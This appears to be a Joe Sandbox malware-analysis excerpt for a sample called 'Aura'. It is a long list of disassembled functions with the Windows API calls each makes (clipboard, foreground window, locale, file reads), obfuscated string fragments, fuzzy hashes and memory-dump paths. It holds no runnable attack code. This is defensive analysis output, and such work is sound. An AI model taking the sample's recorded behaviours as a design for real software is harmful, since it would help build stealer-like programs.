                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ComputerName
                                                                                                                                                                                                                                                    • String ID: lkip
                                                                                                                                                                                                                                                    • API String ID: 3545744682-4027323060
                                                                                                                                                                                                                                                    • Opcode ID: 0dce492cfbd86a176259a181f0088ba352bd8f2e61f649e0302a60f399a4b98f
                                                                                                                                                                                                                                                    • Instruction ID: cdf27a13c466fbb9abb2b2c465a83697adcacc6ecffa19db7df9779b07a46204
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0dce492cfbd86a176259a181f0088ba352bd8f2e61f649e0302a60f399a4b98f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C11E07420C7E28ACB358B28D5947BBBBE0AFD6304F54491EC0CECB281D77890468B56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                                                                                                                                    • Opcode ID: e0ea79f32d4207d9c0cacc6129b78ccc2307d9fbf27c87ca22ba5cae7e36243d
                                                                                                                                                                                                                                                    • Instruction ID: 1dfa69e5bb6715dccf0da08de28a71486c821f0b536322e468d5cb84a4a9e986
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0ea79f32d4207d9c0cacc6129b78ccc2307d9fbf27c87ca22ba5cae7e36243d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 613152B4E142089FDB40EFACD985A9DBBF0BF48304F114569E458E7360E774A944CF96
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043D1AA
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043D1C0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2020703349-0
                                                                                                                                                                                                                                                    • Opcode ID: c4e5699213e8c8392b4d3a6b569e32cded55f0697a2c8afc432cfcaf34d365f3
                                                                                                                                                                                                                                                    • Instruction ID: 3dbaf8c9d4b4cdac177c22d0d0fe4f5d6608661041d7d8772ec8f984dcac4e78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4e5699213e8c8392b4d3a6b569e32cded55f0697a2c8afc432cfcaf34d365f3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADD027FDD5310057C94C5B31ED1E41F36119B9B355714443DF40342372CD594807C54A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B481,00000000,?), ref: 0043CF52
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: 7f3820e98a24e56921eea2794d8514486a620388b301369882b321bfb5007782
                                                                                                                                                                                                                                                    • Instruction ID: c4c6d5ac5a7046e1c04a2e0ad53a0c9e2ada00cb9aac4fe49d4db54e1692947d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f3820e98a24e56921eea2794d8514486a620388b301369882b321bfb5007782
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EF0E976509211DBD2102F357C02B6B3664EF9B314F05183AF90162262DB38D401C6DF
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c357cb78a10ff4b601ec592c0478845f0acacc15cc90f3d924e81932a5521e4
                                                                                                                                                                                                                                                    • Instruction ID: 7847bb4a7bd209f11415ef5ca367ee99660b6cebd6875d82417a713686dd90f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c357cb78a10ff4b601ec592c0478845f0acacc15cc90f3d924e81932a5521e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0F4B46087018FE314DF29D5A875EBBE0AF85304F10881DE4A98B390C7B99A498F82
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                                                                                                                                    • Opcode ID: 43b39e7b89dcea8cb4d23f6fcea4062702254718ce9a141239979cc04b17bcb7
                                                                                                                                                                                                                                                    • Instruction ID: 96b0ab723c267d360180f15b5477e76b580b839288d4f0db16b7bd8258451ab1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43b39e7b89dcea8cb4d23f6fcea4062702254718ce9a141239979cc04b17bcb7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0F4B46097028FD301CF24C5E470BBBE4BF89308F10881CE1900B355C3B5A649CF82
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C877
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeSecurity
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 640775948-0
                                                                                                                                                                                                                                                    • Opcode ID: 28478618b8bf013e95b7138ec7a52dc306bad92f05b26cb4ec7a7e52e234d450
                                                                                                                                                                                                                                                    • Instruction ID: 1e3e2e598fd455d471313fdc32214382811b636f90739155dff12dd62cbeea8f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28478618b8bf013e95b7138ec7a52dc306bad92f05b26cb4ec7a7e52e234d450
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97E05E79BC52047BF6284B18DD43F84220243C6B21F3D8224B310EE7D8CDF8A012420D
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C843
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Initialize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                                                                                                                    • Opcode ID: 9db20bcde595f6b808fc88834a66c7a984b9a00e406f242fa5d17b3b7a9d0ad7
                                                                                                                                                                                                                                                    • Instruction ID: e5954fe18ae31227c9ebc57c7171ed4deaa3088f77e6c40460de058f9c649bee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9db20bcde595f6b808fc88834a66c7a984b9a00e406f242fa5d17b3b7a9d0ad7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2D05E256A41446BD348A76DAC46F2236989B87716F840239F252966D2E9506810C26A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,0040AF96,?), ref: 0043B4BE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                    • Opcode ID: 429c131509c383a8080d6349d90cad9e8071549669016c5803abf4d1718e22ef
                                                                                                                                                                                                                                                    • Instruction ID: 58de357fc96c06f87596776b9ae076427f094bf4a21e5fbafae531d5480062ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 429c131509c383a8080d6349d90cad9e8071549669016c5803abf4d1718e22ef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AD0127140A922EBC7101F15FC07B9A3A64EF09761F070865F4406B0B1C634DC51DAD8
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043B489
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: e101f999de7608f65741e262228b5bb0f7081bf9408d8d083b24d78faad8d434
                                                                                                                                                                                                                                                    • Instruction ID: 74af769b7eed74eb0bbf98d3c0715bab597ac674c92011b1c0092895a3fe5e5d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e101f999de7608f65741e262228b5bb0f7081bf9408d8d083b24d78faad8d434
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CB00274156515B9E17127115CD5F7F1D6CDF47ED5F100058B204140D04E545401D57E
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043B489
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: e673e6dd3fec5261cced75f808d9bb89ecabcd96bcb259183d1e251c2252e486
                                                                                                                                                                                                                                                    • Instruction ID: 1c973efff51b4848ffeff69cb2d809a45373ecc0414c0770032ce1ef959c8293
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e673e6dd3fec5261cced75f808d9bb89ecabcd96bcb259183d1e251c2252e486
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DA00274156511F9D16127115C95F7F2968AB47A95F100068A204140A04E645001D56E
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0043CFA0: LdrInitializeThunk.NTDLL(004401FA,00000002,00000018,?,?,00000018,?,?,?), ref: 0043CFCE
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0041A22A
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0041A2AB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                    • String ID: M"O$fI.K$kjih$kjih$kjih$pq
                                                                                                                                                                                                                                                    • API String ID: 764372645-57064758
                                                                                                                                                                                                                                                    • Opcode ID: ca8ec4aa3c6a2665215101971d6ba1bdbaeb8bf3706cfe3159db190018bb5402
                                                                                                                                                                                                                                                    • Instruction ID: fd54df58326f29ab5dcbf35c0345235bb947318f3f37ecb71676f87aa7f67674
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca8ec4aa3c6a2665215101971d6ba1bdbaeb8bf3706cfe3159db190018bb5402
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 469269756093405FE7108F54D8807BBBBE2EBD5720F28C82EE5C497391D6799C82CB9A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 004242DA
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,-71D32B14), ref: 00424355
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID: .sM$7KE$RDB$@AF$WQ$_Y
                                                                                                                                                                                                                                                    • API String ID: 237503144-2889437315
                                                                                                                                                                                                                                                    • Opcode ID: fd78b8c373c58d299f0efd85543560d449a9ccfd47c3bf4ca4055bad2ee08b59
                                                                                                                                                                                                                                                    • Instruction ID: 85809d692e9afabcf63d0d0bcf8913d9c1483266ef3a87abd0c9896b8c6eff8a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd78b8c373c58d299f0efd85543560d449a9ccfd47c3bf4ca4055bad2ee08b59
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D58102B52083509FE710CF28E84175FBBE0FB86718F11883DF5959B281D775890A8B9B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: '+5>$2)!*$41##$>"0$MfA$kjih$nVA$L4$L4
                                                                                                                                                                                                                                                    • API String ID: 0-3043129773
                                                                                                                                                                                                                                                    • Opcode ID: ea301c221e4f7209e4005bd83a573e57ebd9b891a4b9fdff834431d860e3db60
                                                                                                                                                                                                                                                    • Instruction ID: fcf332fa4094b6d4c8e6d19021d207cb0fce23afcc655588a84ff703f5482b79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea301c221e4f7209e4005bd83a573e57ebd9b891a4b9fdff834431d860e3db60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE224676A09252CFD724CF28C8507AFB7E2ABC5304F1A893ED49997351DA38DC45CB86
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(00000000,?,000BE58D), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000,?,?,00000028,000B8363), ref: 000BC210
                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32 ref: 000C138F
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 000C13CD
                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 000C13E0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 000C1428
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 000C1443
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                    • String ID: ,K
                                                                                                                                                                                                                                                    • API String ID: 415426439-2737474789
                                                                                                                                                                                                                                                    • Opcode ID: 516ad1bb0e5bf431ef7605fe434c75c7ee634f0ef6f00fba185b149f42b675d2
                                                                                                                                                                                                                                                    • Instruction ID: 503a076f0861a96d20e783e9545d4de9ecd99f2d95e561a8483d9d6e3f0a2e60
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 516ad1bb0e5bf431ef7605fe434c75c7ee634f0ef6f00fba185b149f42b675d2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8516B71A00216ABEB60EFA5CC45FFE77B8AF06704F14446EF905EB192E7709A41CB61
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: I3_1$KJ$SZVm$S_SY$Xjbn$\EEZ$fJG]$v
                                                                                                                                                                                                                                                    • API String ID: 0-857426366
                                                                                                                                                                                                                                                    • Opcode ID: 83eb09dffcbbdc965478d9f71f007973de22261fc9de05b1123d5afc216dca86
                                                                                                                                                                                                                                                    • Instruction ID: f42e5032e00e911cfcbd82df24bde4ae6fb01620b43778d51bef518939847aa5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83eb09dffcbbdc965478d9f71f007973de22261fc9de05b1123d5afc216dca86
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72B1D47160C3914AD726CF2988503ABBFE19F97344F0899ADE4D5AB383C23DC906C756
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1494355150-0
                                                                                                                                                                                                                                                    • Opcode ID: 38ddb1ce13d4ad96419e6f72ad5d578662d1422aa4eeb45f494bb9f640afa450
                                                                                                                                                                                                                                                    • Instruction ID: 4b4268758659fb9edbbb30050a8655cc6678ffe48e55207d2636374afee827fe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38ddb1ce13d4ad96419e6f72ad5d578662d1422aa4eeb45f494bb9f640afa450
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 505127B1904B518FD700AF78C94939EBFE0AF09314F04863AD49597281D3BC9959C797
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,000C13BD,?,00000000), ref: 000C1AA0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,000C13BD,?,00000000), ref: 000C1AC9
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,000C13BD,?,00000000), ref: 000C1ADE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    • Opcode ID: 44480b048ff8173efdc9466ef31d6e3659c5c5b0a5dd4ef83a7aef351cbcdea3
                                                                                                                                                                                                                                                    • Instruction ID: c443a44740d2f7e57ebe9216f0cfb535656bd4d06e068a57a1795c44f523445c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44480b048ff8173efdc9466ef31d6e3659c5c5b0a5dd4ef83a7aef351cbcdea3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85216232A06100AAE774CB54C900FDF73EAEF56B54B56846DE90AD7216E732DD40C752
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: '$CJMx$LL[R$Pk$UgRQ$t
                                                                                                                                                                                                                                                    • API String ID: 0-841269659
                                                                                                                                                                                                                                                    • Opcode ID: ad6ac4a83ce9c7b2206c5238d969d6c841d12ab1a149e2618a8805dbebfd9730
                                                                                                                                                                                                                                                    • Instruction ID: a27ab65c82591e32e6bf893d3bde866ba41d28cee15bcb772b57012cf8e8fd86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad6ac4a83ce9c7b2206c5238d969d6c841d12ab1a149e2618a8805dbebfd9730
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B81CEB460D3918BD3358F29A5A13EBBFE1EF96300F18495DD4D94B392C739840A8B97
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000A1240: _strlen.LIBCMT ref: 000A12BA
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 000A2046
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000A206B
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 000A207A
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 000A20CD
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 000A21FD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
